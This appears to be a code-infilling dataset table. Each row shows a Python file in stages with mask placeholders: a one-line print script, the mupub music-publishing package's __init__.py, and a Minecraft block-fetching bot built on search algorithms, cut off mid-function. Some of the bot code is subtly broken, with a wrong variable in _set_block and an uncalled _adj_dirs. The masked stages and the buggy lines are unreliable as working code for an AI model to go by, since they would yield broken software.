index
int64 0
10k
| blob_id
stringlengths 40
40
| step-1
stringlengths 0
305k
| step-2
stringlengths 6
1.1M
⌀ | step-3
stringlengths 15
1.23M
⌀ | step-4
stringlengths 23
1.34M
⌀ | step-5
stringlengths 55
1.2M
⌀ | step-ids
sequencelengths 1
5
|
---|---|---|---|---|---|---|---|
0 | aff1a9263e183610f403a4d6a7f27b45eacb7ff2 | <mask token>
| <mask token>
print(name * 1000)
| name = 'valentina '
print(name * 1000)
| name='valentina '
print(name*1000)
| null | [
0,
1,
2,
3
] |
1 | eabf06481509962652812af67ad59da5cfe30fae | <mask token>
| <mask token>
__all__ = ('__title__', '__summary__', '__version__', '__author__',
'__license__', '__copyright__')
__title__ = 'mupub'
__summary__ = 'Musical score publishing utility for the Mutopia Project'
<mask token>
__version__ = '1.0.8'
__author__ = 'Glen Larsen, Chris Sawer'
__author_email__ = '[email protected]'
__uri__ = 'http://mutopiaproject.org/'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 The Mutopia Project'
<mask token>
| <mask token>
__all__ = ('__title__', '__summary__', '__version__', '__author__',
'__license__', '__copyright__')
__title__ = 'mupub'
__summary__ = 'Musical score publishing utility for the Mutopia Project'
<mask token>
__version__ = '1.0.8'
__author__ = 'Glen Larsen, Chris Sawer'
__author_email__ = '[email protected]'
__uri__ = 'http://mutopiaproject.org/'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 The Mutopia Project'
from .assets import collect_assets
from .commands.build import build
from .commands.check import check
from .commands.init import init
from .commands.tag import tag
from .commands.clean import clean
from .config import CONFIG_DICT, CONFIG_DIR, getDBPath
from .config import test_config, saveConfig
from .core import MUTOPIA_BASE, FTP_BASE, URL_BASE
from .core import id_from_footer
from .exceptions import BadConfiguration, IncompleteBuild, TagProcessException
from .header import Loader, LYLoader, VersionLoader
from .header import RawLoader, Header, REQUIRED_FIELDS
from .header import find_header
from .lily import LyLocator, LyVersion
from .validate import Validator, DBValidator, in_repository
from .tagedit import tag_header, tag_file
from .rdfu import NS, MuRDF
from .utils import resolve_input, resolve_lysfile
| """ mupub module.
"""
__all__ = (
'__title__', '__summary__', '__version__',
'__author__', '__license__', '__copyright__',
)
__title__ = 'mupub'
__summary__ = 'Musical score publishing utility for the Mutopia Project'
"""Versioning:
This utility follows a MAJOR . MINOR . EDIT format. Upon a major
release, the MAJOR number is incremented and the MINOR is zeroed.
During development of an upcoming release, the MINOR number may be
incremented.
"""
__version__ = '1.0.8'
__author__ = 'Glen Larsen, Chris Sawer'
__author_email__= '[email protected]'
__uri__ = 'http://mutopiaproject.org/'
__license__ = 'MIT'
__copyright__ = 'Copyright 2018 The Mutopia Project'
from .assets import collect_assets
from .commands.build import build
from .commands.check import check
from .commands.init import init
from .commands.tag import tag
from .commands.clean import clean
from .config import CONFIG_DICT, CONFIG_DIR, getDBPath
from .config import test_config, saveConfig
from .core import MUTOPIA_BASE, FTP_BASE, URL_BASE
from .core import id_from_footer
from .exceptions import BadConfiguration, IncompleteBuild, TagProcessException
from .header import Loader, LYLoader, VersionLoader
from .header import RawLoader, Header, REQUIRED_FIELDS
from .header import find_header
from .lily import LyLocator, LyVersion
from .validate import Validator, DBValidator, in_repository
from .tagedit import tag_header, tag_file
from .rdfu import NS, MuRDF
from .utils import resolve_input,resolve_lysfile
| null | [
0,
1,
2,
3
] |
2 | 54f0ed5f705d5ada28721301f297b2b0058773ad | <mask token>
class _GenericBot:
<mask token>
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
<mask token>
<mask token>
<mask token>
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions(
) + self._get_placement_actions(block_)
<mask token>
<mask token>
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception(
'You requested not to place %s, but it is the only block in the inventory.'
% exclude)
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
<mask token>
<mask token>
<mask token>
<mask token>
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
_WATER}
if can_move_up:
if self._surrounded():
rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,
1, 0),)})
else:
rtn.append({'func': '_move_up', 'args': (exclude,)})
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
0),)})
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
1, 0),)})
break
pos.y -= 1
<mask token>
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos_above,)})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos,)})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
'exclude': exclude}})
return rtn
<mask token>
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
<mask token>
<mask token>
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {}
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + _key_vals(self._inventory) +
_key_vals(self._changes)))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(
) + player_loc) / 2, 'kwargs': {'block': block_id}})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z
) and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x
) + abs(diff.z) == 2 and state.get_block(self._player_loc +
diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
<mask token>
| <mask token>
class _GenericBot:
<mask token>
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
def take_action(self, action):
"""Take the action (acquired from _get_legal_actions)."""
getattr(self, action['func'])(*action.get('args', ()), **action.get
('kwargs', {}))
def take_actions(self, actions, seconds=None):
"""Take these actions. If seconds is not None, sleep 'seconds'
seconds.
"""
if not actions:
return
self.take_action(actions[0])
for action in actions[1:]:
if seconds is not None:
sleep(seconds)
self.take_action(action)
def get_pos(self):
"""Return the position."""
return deepcopy(self._pos)
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions(
) + self._get_placement_actions(block_)
<mask token>
def _get_block(self, pos):
"""Get the block at the position."""
raise NotImplementedError
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception(
'You requested not to place %s, but it is the only block in the inventory.'
% exclude)
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
def _move_down(self):
"""Move and mine the block below."""
new_pos = self._pos + _Vec3(0, -1, 0)
block_ = self._get_block(new_pos)
if block_ != _WATER:
self._add_to_inv(block_)
self._move(new_pos)
<mask token>
<mask token>
def _mine(self, loc):
"""Mine the block."""
block_ = self._get_block(loc)
self._add_to_inv(block_)
self._set_block(loc, _AIR)
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
_WATER}
if can_move_up:
if self._surrounded():
rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,
1, 0),)})
else:
rtn.append({'func': '_move_up', 'args': (exclude,)})
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
0),)})
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
1, 0),)})
break
pos.y -= 1
<mask token>
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos_above,)})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos,)})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
'exclude': exclude}})
return rtn
<mask token>
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
<mask token>
<mask token>
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {}
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + _key_vals(self._inventory) +
_key_vals(self._changes)))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
block_loc = self._get_block_loc(block_id)
mine_prob = _MineProblem(imag_bot, block_loc, block_id)
mine_actions = astar(mine_prob, _mine_heuristic)
self.take_actions(mine_actions, _DELAY)
imag_bot = _ImaginaryBot(self._pos, self._inventory)
player_loc = _player_loc()
return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
return_actions = astar(return_prob, _return_heuristic)
imag_bot.take_actions(return_actions)
return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(
) + player_loc) / 2, 'kwargs': {'block': block_id}})
self.take_actions(return_actions, _DELAY)
def _get_block_loc(self, block_id):
"""Return the location of the block."""
find_prob = FindProblem(self._pos, block_id)
dirs = bfs(find_prob)
return self._pos + sum(dirs)
def _set_block(self, pos, block_):
"""Place an actual block in the world.
block is a block id."""
_get_mc().setBlock(pos, block_)
def _get_block(self, pos):
"""Get the block at the position."""
return _get_mc().getBlock(pos)
def _move(self, pos):
"""Move there, and set the appropriate blocks."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
self._set_block(pos, self._BOT_BLOCK)
self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
self._pos = pos
class FindProblem(SearchProblem):
"""Problem for finding the location of a block in the world.
A state in this problem is a location.
"""
def __init__(self, start_loc, block_id):
"""Initialize."""
self._start_loc = deepcopy(start_loc)
self._block_id = block_id
def getStartState(self):
"""Return the starting location."""
return self._start_loc
def isGoalState(self, state):
return _get_mc().getBlock(state) == self._block_id
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for dir_ in _all_dirs():
successor = state + dir_
if successor.y <= _get_mc().getHeight(successor.x, successor.z
) and _get_mc().getBlock(successor) != _BEDROCK:
rtn.append((successor, dir_, 1))
return rtn
class _MineProblem(SearchProblem):
"""The problem of finding the block and mining it (not returning
it)."""
def __init__(self, imag_bot, block_loc, block_id):
"""Initialize the problem with an _ImaginaryBot.
block_loc is a Vec3.
"""
self._bot = imag_bot
self._block_loc = deepcopy(block_loc)
self._block_id = block_id
def get_block_loc(self):
"""Return the block location."""
return deepcopy(self._block_loc)
def get_block_id(self):
"""Return the block it's trying to mine."""
return self._block_id
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot has the block."""
return state.contains(self._block_id)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions():
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
class _ReturnProblem(SearchProblem):
"""The problem of returning to the player. This does not place the block
next to the player."""
def __init__(self, imag_bot, block_, player_loc):
"""Initialized the problem with an _ImaginaryBot.
block is a block id."""
self._bot = imag_bot
self._block = block_
self._player_loc = player_loc
def get_player_loc(self):
"""Return the player location."""
return deepcopy(self._player_loc)
def getStartState(self):
"""Return the bot passed in."""
return self._bot
def isGoalState(self, state):
"""Return whether or not the bot is next to the player."""
diff = state.get_pos() - self._player_loc
return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x
) + abs(diff.z) == 2 and state.get_block(self._player_loc +
diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)
def getSuccessors(self, state):
"""Return the successors."""
rtn = []
for action in state.get_legal_actions(self._block):
successor = deepcopy(state)
successor.take_action(action)
rtn.append((successor, action, 1))
return rtn
<mask token>
| <mask token>
class _Vec3(Vec3):
"""A Vec3 that is hashable. Everything in this program should use this
class."""
def __hash__(self):
"""Return the hash."""
return hash((self.x, self.y, self.z))
def clone(self):
"""Return a clone."""
return _Vec3(self.x, self.y, self.z)
class _GenericBot:
"""A generic bot."""
def __init__(self, pos, inventory=None):
"""Initialize with an empty inventory.
inventory is a dictionary. If None, an empty one will be used."""
if inventory is None:
self._inventory = {}
else:
self._inventory = deepcopy(inventory)
self._pos = deepcopy(pos)
def take_action(self, action):
"""Take the action (acquired from _get_legal_actions)."""
getattr(self, action['func'])(*action.get('args', ()), **action.get
('kwargs', {}))
def take_actions(self, actions, seconds=None):
"""Take these actions. If seconds is not None, sleep 'seconds'
seconds.
"""
if not actions:
return
self.take_action(actions[0])
for action in actions[1:]:
if seconds is not None:
sleep(seconds)
self.take_action(action)
def get_pos(self):
"""Return the position."""
return deepcopy(self._pos)
def get_legal_actions(self, block_=None):
"""Return a list of legal actions.
If block_ is None, return all legal actions. Otherwise, return all
legal actions that don't involve placing the block."""
return self._get_move_actions(block_) + self._get_mine_actions(
) + self._get_placement_actions(block_)
def contains(self, block_):
"""Return whether or not the bot contains the block id."""
return block_ in self._inventory
def _get_block(self, pos):
"""Get the block at the position."""
raise NotImplementedError
def _place(self, loc, exclude=None, block_=None):
"""Place a block from the inventory only.
If exclude is not None, place a block that is not 'exclude'.
If block is not None, place that block only.
"""
if not self._inventory:
raise Exception('Inventory empty')
if block_ is None:
for key in self._inventory:
if key != exclude:
block_ = key
break
else:
raise Exception(
'You requested not to place %s, but it is the only block in the inventory.'
% exclude)
if block_ not in self._inventory:
raise Exception('Block %s is not in the inventory' % block_)
if self._inventory[block_] == 1:
del self._inventory[block_]
else:
self._inventory[block_] -= 1
self._set_block(loc, block_)
def _move_down(self):
"""Move and mine the block below."""
new_pos = self._pos + _Vec3(0, -1, 0)
block_ = self._get_block(new_pos)
if block_ != _WATER:
self._add_to_inv(block_)
self._move(new_pos)
def _add_to_inv(self, block_):
"""Add the block to the inventory."""
if block_ in self._inventory:
self._inventory[block_] += 1
else:
self._inventory[block_] = 1
def _move_up(self, exclude=None):
"""Move and place a block below.
If exclude is not None, place a block that is not 'exclude'.
"""
self._move(self._pos + _Vec3(0, 1, 0))
self._place(self._pos + _Vec3(0, -1, 0), exclude)
def _mine(self, loc):
"""Mine the block."""
block_ = self._get_block(loc)
self._add_to_inv(block_)
self._set_block(loc, _AIR)
def _get_move_actions(self, exclude=None):
"""Return a list of legal movement actions.
exclude is the block to exclude.
"""
rtn = []
can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
_WATER}
if can_move_up:
if self._surrounded():
rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0,
1, 0),)})
else:
rtn.append({'func': '_move_up', 'args': (exclude,)})
hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
rtn.append({'func': '_move_down'})
for dir_ in _adj_dirs():
rtn.extend(self._side_moves(dir_, can_move_up))
return rtn
def _side_moves(self, dir_, can_move_up):
"""Return the list of side moves.
dir_ is an adjacent direction.
can_move_up is a boolean for whether or not the bot can move up.
"""
rtn = []
base_pos = self._pos + dir_
base_block = self._get_block(base_pos)
empty_blocks = {_AIR, _WATER}
if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,
0),)})
for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
if self._get_block(base_pos + vert_dir) not in empty_blocks:
break
else:
pos = base_pos + _Vec3(0, -1, 0)
for _ in xrange(_DROP_PLUS_1):
block_ = self._get_block(pos)
if block_ != _AIR:
if block_ != _LAVA:
rtn.append({'func': '_move', 'args': (pos + _Vec3(0,
1, 0),)})
break
pos.y -= 1
def _surrounded(self):
"""Return whether or not the bot is surrounded by water."""
for dir_ in _adj_dirs():
if self._get_block(self._pos + dir_) != _WATER:
return False
return True
def _get_mine_actions(self):
"""Return a list of legal mining actions (that only involve mining
and not moving)."""
rtn = []
dont_mine = {_AIR, _WATER, _LAVA}
pos_above = self._pos + _Vec3(0, 2, 0)
if self._get_block(pos_above) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos_above,)})
for dir_ in _adj_dirs():
pos = self._pos + dir_
for _ in xrange(2):
if self._get_block(pos) not in dont_mine:
rtn.append({'func': '_mine', 'args': (pos,)})
pos = pos + _Vec3(0, 1, 0)
return rtn
def _get_placement_actions(self, exclude=None):
"""Return a list of legal actions that only involve placing a block
from the inventory.
exclude is a block id. It is the block that should not be placed. If None,
any block can be placed."""
if not self._has_blocks_to_place(exclude=exclude):
return []
dirs = [_Vec3(0, 2, 0)]
for dir_ in _adj_dirs():
dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])
if self._get_block(self._pos + dir_) in [_AIR, _WATER]:
dirs.append(dir_ + _Vec3(0, -1, 0))
rtn = []
for dir_ in dirs:
pos = self._pos + dir_
if self._can_place(pos):
rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {
'exclude': exclude}})
return rtn
def _can_place(self, loc):
"""Return whether or not the bot can place a block at that location
independent of what it has in its inventory."""
non_blocks = [_AIR, _WATER, _LAVA]
player = [self._pos, self._pos + _Vec3(0, 1, 0)]
for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):
new_loc = loc + dir_
if new_loc not in player and self._get_block(new_loc
) not in non_blocks:
return True
return False
def _has_blocks_to_place(self, exclude=None):
"""Return whether or not the bot can place a block from the
inventory. If exclude is None, any block can be placed."""
for block_ in self._inventory:
if block_ != exclude:
return True
return False
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
raise NotImplementedError
def _move(self, pos):
"""Move there only."""
self._pos = deepcopy(pos)
class _ImaginaryBot(_GenericBot):
"""A bot used for finding paths that doesn't actually change blocks
in the world."""
def __init__(self, pos, inventory=None):
"""Create a new bot."""
_GenericBot.__init__(self, pos, inventory)
self._changes = {}
def _set_block(self, pos, block_):
"""Set a block. block_ is the block id."""
self._changes[deepcopy(pos)] = block
def _get_block(self, pos):
"""Get the block at the position."""
if pos in self._changes:
return self._changes[pos]
else:
return _get_mc().getBlock(pos)
def get_block(self, pos):
"""The public version."""
return self._get_block(pos)
def __hash__(self):
"""Return the hash."""
return hash(frozenset([self._pos] + _key_vals(self._inventory) +
_key_vals(self._changes)))
class Bot(_GenericBot):
"""The real bot.
All vector arguments are Vec3s."""
_BOT_BLOCK = block.IRON_BLOCK.id
def __init__(self):
"""Create a bot next to the player."""
pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
pos = _Vec3(pos.x, pos.y, pos.z)
_GenericBot.__init__(self, pos)
self._pos = pos
self._move(self._pos)
@staticmethod
def destroy_all():
"""Destroy all bots within a small distance (in case I forget to
destroy one)."""
player_loc = _player_loc()
minec = _get_mc()
rad = 10
for x in xrange(player_loc.x - rad, player_loc.x + rad):
for y in xrange(player_loc.y - rad, player_loc.y + rad):
for z in xrange(player_loc.z - rad, player_loc.z + rad):
if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
minec.setBlock(x, y, z, _AIR)
def destroy(self):
"""Set itself to air."""
self._set_block(self._pos, _AIR)
self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
def fetch(self, block_name):
"""Mine and return a block to the player."""
imag_bot = _ImaginaryBot(self._pos, self._inventory)
block_id = getattr(block, block_name).id
